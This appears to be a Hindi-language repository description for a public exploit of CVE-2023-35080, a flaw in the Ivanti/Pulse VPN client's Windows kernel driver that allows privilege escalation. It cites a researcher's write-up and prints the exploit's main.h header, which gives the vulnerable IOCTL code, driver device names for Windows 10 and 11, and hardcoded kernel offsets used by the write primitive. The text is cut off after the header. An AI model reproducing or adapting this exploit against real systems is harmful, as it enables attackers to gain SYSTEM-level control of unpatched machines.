
CVE-2023-35080 शोषण जो विशेषाधिकार वृद्धि की ओर ले जाता हैCVE-2023-35080 के शोषण से संबंधित कोड, जो Windows में Ivanti/Pulse VPN क्लाइंट कर्नेल ड्राइवर में एक राइट प्रिमिटिव का उपयोग करता है। यह राइट प्रिमिटिव विशेषाधिकार वृद्धि की ओर ले जाता है।
यह एक्सप्लॉइट निम्नलिखित लेख में साझा किए गए तकनीकी विवरणों की सहायता से बनाया गया था: https://northwave-cybersecurity.com/ivanti-pulse-vpn-privilege-escalation।
कुछ विवरण main.h फ़ाइल में हार्डकोड किए गए हैं:
#pragma once
#include <Windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <winternl.h>
#define VULN_IOCTL 0x80002018
////////
/*
* jnprTdi_9115_15819 W10
*/
// #define DEVICE_NAME_W L"jnprTdi_9115_15819"
// // KxWaitForSpinLockAndAcquire
// #define SPIN_OFFSET 0x300ea0
// // KxTryToAcquireSpinLock
// #define TRY_SPIN_OFFSET 0x361758
// // void write_char(byte param_1,byte **param_2,int *param_3)
// #define WRITE_CHAR_OFFSET 0x3d5878
////////
/*
* jnprTdi_9117_18209 W11
*/
#define DEVICE_NAME_W L"jnprTdi_9117_18209"
// KxWaitForSpinLockAndAcquire
#define SPIN_OFFSET 0x300e9e
// KxTryToAcquireSpinLock
#define TRY_SPIN_OFFSET 0x361757
// void write_char(byte param_1,byte **param_2,int *param_3)
#define WRITE_CHAR_OFFSET 0x3d93f8
////////
[...]